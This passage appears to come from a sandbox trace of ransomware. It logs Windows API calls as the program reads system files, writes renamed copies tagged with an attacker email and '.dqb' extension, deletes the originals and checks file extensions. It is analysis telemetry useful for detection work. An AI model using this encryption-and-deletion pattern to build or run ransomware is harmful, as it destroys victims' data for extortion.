files\\system\\ole db\\oledbjvs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0047.139] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=9804) returned 1 [0047.140] CloseHandle (hObject=0x1dc) returned 1 [0047.142] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc")) returned 0x20 [0047.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0047.145] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0047.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56 [0047.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56 [0047.145] lstrlenW (lpString=".doc") returned 4 [0047.145] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0047.145] lstrlenW (lpString=".docx") returned 5 [0047.145] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0047.145] lstrlenW (lpString=".pdf") returned 4 [0047.145] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0047.145] lstrlenW (lpString=".xls") returned 4 [0047.145] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0047.145] lstrlenW (lpString=".xlsx") returned 5 [0047.145] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0047.145] lstrlenW (lpString=".ppt") returned 4 [0047.145] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0047.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56 [0047.146] lstrlenW (lpString=".zip") returned 4 [0047.146] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0047.146] lstrlenW (lpString=".rar") returned 4 [0047.146] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0047.146] lstrlenW (lpString=".bz2") returned 4 [0047.146] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0047.146] lstrlenW (lpString=".7z") returned 3 [0047.146] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0047.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56 [0047.146] lstrlenW (lpString=".dbf") returned 4 [0047.146] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0047.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56 [0047.146] lstrlenW (lpString=".1cd") returned 4 [0047.146] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0047.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56 [0047.146] lstrlenW (lpString=".jpg") returned 4 [0047.146] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0047.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56 [0047.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56 [0047.146] lstrlenW (lpString=".doc") returned 4 [0047.146] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0047.146] lstrlenW (lpString=".docx") returned 5 [0047.146] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0047.146] lstrlenW (lpString=".pdf") returned 4 [0047.146] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0047.146] lstrlenW (lpString=".xls") returned 4 [0047.146] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0047.146] lstrlenW (lpString=".xlsx") returned 5 [0047.146] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0047.146] lstrlenW (lpString=".ppt") returned 4 [0047.146] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0047.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56 [0047.146] lstrlenW (lpString=".zip") returned 4 [0047.146] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0047.146] lstrlenW (lpString=".rar") returned 4 [0047.147] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0047.147] lstrlenW (lpString=".bz2") returned 4 [0047.147] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0047.147] lstrlenW (lpString=".7z") returned 3 [0047.147] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0047.147] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56 [0047.147] lstrlenW (lpString=".dbf") returned 4 [0047.147] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0047.147] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56 [0047.147] lstrlenW (lpString=".1cd") returned 4 [0047.147] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0047.147] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56 [0047.147] lstrlenW (lpString=".jpg") returned 4 [0047.147] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0047.147] lstrcmpiW (lpString1=".png", lpString2=".dqb") returned 1 [0047.147] lstrlenW (lpString="blackbars60.png") returned 15 [0047.147] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\blackbars60.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0047.291] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=6431) returned 1 [0047.291] CloseHandle (hObject=0x180) returned 1 [0047.291] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\blackbars60.png")) returned 0x20 [0047.291] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\blackbars60.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0047.292] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\blackbars60.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0047.292] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png") returned 73 [0047.292] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png") returned 73 [0047.292] lstrlenW (lpString=".doc") returned 4 [0047.292] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0047.292] lstrlenW (lpString=".docx") returned 5 [0047.292] lstrcmpiW (lpString1=".docx", lpString2="0.png") returned -1 [0047.292] lstrlenW (lpString=".pdf") returned 4 [0047.292] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0047.292] lstrlenW (lpString=".xls") returned 4 [0047.292] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0047.292] lstrlenW (lpString=".xlsx") returned 5 [0047.292] lstrcmpiW (lpString1=".xlsx", lpString2="0.png") returned -1 [0047.292] lstrlenW (lpString=".ppt") returned 4 [0047.292] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0047.292] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png") returned 73 [0047.292] lstrlenW (lpString=".zip") returned 4 [0047.292] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0047.292] lstrlenW (lpString=".rar") returned 4 [0047.292] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0047.292] lstrlenW (lpString=".bz2") returned 4 [0047.292] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0047.292] lstrlenW (lpString=".7z") returned 3 [0047.292] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0047.292] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png") returned 73 [0047.292] lstrlenW (lpString=".dbf") returned 4 [0047.292] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0047.292] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png") returned 73 [0047.292] lstrlenW (lpString=".1cd") returned 4 [0047.292] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0047.292] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png") returned 73 [0047.293] lstrlenW (lpString=".jpg") returned 4 [0047.293] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0048.985] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=32146) returned 1 [0048.985] CloseHandle (hObject=0x184) returned 1 [0048.985] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl")) returned 0x20 [0048.985] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0048.985] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0048.986] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0048.986] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0048.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0048.986] GetLastError () returned 0x0 [0048.986] ReadFile (in: hFile=0x184, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x7d92, lpOverlapped=0x0) returned 1 [0048.988] WriteFile (in: hFile=0x1e4, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x7da0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x7da0, lpOverlapped=0x0) returned 1 [0048.989] ReadFile (in: hFile=0x184, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0048.989] WriteFile (in: hFile=0x1e4, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xe6, lpOverlapped=0x0) returned 1 [0048.989] SetEndOfFile (hFile=0x1e4) returned 1 [0048.990] CloseHandle (hObject=0x1e4) returned 1 [0048.990] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0048.990] SetEndOfFile (hFile=0x184) returned 1 [0048.991] CloseHandle (hObject=0x184) returned 1 [0048.991] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0048.991] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl")) returned 1 [0048.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0048.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0048.991] lstrlenW (lpString=".doc") returned 4 [0048.991] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0048.991] lstrlenW (lpString=".docx") returned 5 [0048.991] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0048.991] lstrlenW (lpString=".pdf") returned 4 [0048.991] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0048.991] lstrlenW (lpString=".xls") returned 4 [0048.991] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0048.991] lstrlenW (lpString=".xlsx") returned 5 [0048.991] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0048.991] lstrlenW (lpString=".ppt") returned 4 [0048.991] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0048.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0048.991] lstrlenW (lpString=".zip") returned 4 [0048.991] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0048.992] lstrlenW (lpString=".rar") returned 4 [0048.992] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0048.992] lstrlenW (lpString=".bz2") returned 4 [0048.992] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0048.992] lstrlenW (lpString=".7z") returned 3 [0048.992] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0048.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0048.992] lstrlenW (lpString=".dbf") returned 4 [0048.992] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0048.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0048.992] lstrlenW (lpString=".1cd") returned 4 [0048.992] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0048.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0048.992] lstrlenW (lpString=".jpg") returned 4 [0048.992] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0048.992] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=39515) returned 1 [0048.992] CloseHandle (hObject=0x184) returned 1 [0048.992] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl")) returned 0x20 [0048.992] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0048.992] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0048.993] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0048.993] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0048.993] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0048.993] GetLastError () returned 0x0 [0048.993] ReadFile (in: hFile=0x184, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x9a5b, lpOverlapped=0x0) returned 1 [0048.995] WriteFile (in: hFile=0x1e4, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x9a60, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x9a60, lpOverlapped=0x0) returned 1 [0048.996] ReadFile (in: hFile=0x184, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0048.996] WriteFile (in: hFile=0x1e4, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xe6, lpOverlapped=0x0) returned 1 [0048.996] SetEndOfFile (hFile=0x1e4) returned 1 [0048.997] CloseHandle (hObject=0x1e4) returned 1 [0048.997] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0048.997] SetEndOfFile (hFile=0x184) returned 1 [0048.998] CloseHandle (hObject=0x184) returned 1 [0048.998] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0048.998] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl")) returned 1 [0048.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0048.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0048.998] lstrlenW (lpString=".doc") returned 4 [0048.998] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0048.998] lstrlenW (lpString=".docx") returned 5 [0048.998] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0048.998] lstrlenW (lpString=".pdf") returned 4 [0048.998] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0048.998] lstrlenW (lpString=".xls") returned 4 [0048.998] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0048.998] lstrlenW (lpString=".xlsx") returned 5 [0048.998] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0048.998] lstrlenW (lpString=".ppt") returned 4 [0048.998] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0048.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0048.999] lstrlenW (lpString=".zip") returned 4 [0048.999] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0048.999] lstrlenW (lpString=".rar") returned 4 [0048.999] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0048.999] lstrlenW (lpString=".bz2") returned 4 [0048.999] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0048.999] lstrlenW (lpString=".7z") returned 3 [0048.999] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0048.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0048.999] lstrlenW (lpString=".dbf") returned 4 [0048.999] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0048.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0048.999] lstrlenW (lpString=".1cd") returned 4 [0048.999] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0048.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0048.999] lstrlenW (lpString=".jpg") returned 4 [0048.999] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0049.000] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=29790) returned 1 [0049.000] CloseHandle (hObject=0x184) returned 1 [0049.000] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl")) returned 0x20 [0049.000] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0049.000] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0049.000] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0049.000] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0049.000] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0049.000] GetLastError () returned 0x0 [0049.000] ReadFile (in: hFile=0x184, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x745e, lpOverlapped=0x0) returned 1 [0049.002] WriteFile (in: hFile=0x1e4, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x7460, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x7460, lpOverlapped=0x0) returned 1 [0049.004] ReadFile (in: hFile=0x184, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0049.004] WriteFile (in: hFile=0x1e4, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xe8, lpOverlapped=0x0) returned 1 [0049.004] SetEndOfFile (hFile=0x1e4) returned 1 [0049.004] CloseHandle (hObject=0x1e4) returned 1 [0049.004] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0049.004] SetEndOfFile (hFile=0x184) returned 1 [0049.005] CloseHandle (hObject=0x184) returned 1 [0049.005] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0049.005] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl")) returned 1 [0049.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0049.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0049.005] lstrlenW (lpString=".doc") returned 4 [0049.006] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0049.006] lstrlenW (lpString=".docx") returned 5 [0049.006] lstrcmpiW (lpString1=".docx", lpString2="e.xsl") returned -1 [0049.006] lstrlenW (lpString=".pdf") returned 4 [0049.006] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0049.006] lstrlenW (lpString=".xls") returned 4 [0049.006] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0049.006] lstrlenW (lpString=".xlsx") returned 5 [0049.006] lstrcmpiW (lpString1=".xlsx", lpString2="e.xsl") returned -1 [0049.006] lstrlenW (lpString=".ppt") returned 4 [0049.006] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0049.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0049.006] lstrlenW (lpString=".zip") returned 4 [0049.006] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0049.006] lstrlenW (lpString=".rar") returned 4 [0049.006] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0049.006] lstrlenW (lpString=".bz2") returned 4 [0049.006] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0049.006] lstrlenW (lpString=".7z") returned 3 [0049.006] 